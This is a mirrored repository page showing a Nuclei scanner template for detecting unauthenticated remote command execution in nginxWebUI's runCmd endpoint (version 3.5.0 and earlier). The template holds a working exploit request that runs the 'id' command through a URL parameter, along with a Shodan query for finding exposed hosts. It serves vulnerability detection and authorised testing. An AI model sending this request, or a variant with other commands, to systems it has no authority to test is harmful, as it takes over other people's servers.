admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-02-10 20:53:27 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
e2e9901bf9ec94de03e5ed7490847aac0ccbc598
nuclei-templates/http/vulnerabilities/other/nginxwebui-runcmd-rce.yaml
ghost 5f08fc26d3 chore: sign templates 🤖
2024-12-01 13:57:55 +00:00

39 lines
1.3 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
id: nginxwebui-runcmd-rce
info:
name: nginxWebUI ≤ 3.5.0 runCmd - Remote Command Execution
author: DhiyaneshDk
severity: critical
description: |
nginxWebUIs runCmd feature and is caused by incomplete validation of user input. Attackers can exploit the vulnerability by crafting malicious data to execute arbitrary commands on a vulnerable server without authorization.
reference:
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/nginxWebUI_runCmd_rce.go
- https://www.ctfiot.com/124166.html
- https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/nginxwebui-runcmd-remote-command-execution-vulnerability
metadata:
verified: true
max-request: 1
shodan-query: html:"nginxWebUI"
tags: nginx,nginxwebui,rce
http:
- method: GET
path:
- "{{BaseURL}}/AdminPage/conf/runCmd?cmd=id"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a004830460221008baf1cbcf0b6d23b954d60753bcf53e4630fd28a695a7d5a51f3134deeb227a7022100e150ceb2cccb49f36f085e413ae6adb06768c64be9c2ce5e524afc2a5b146d3f:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink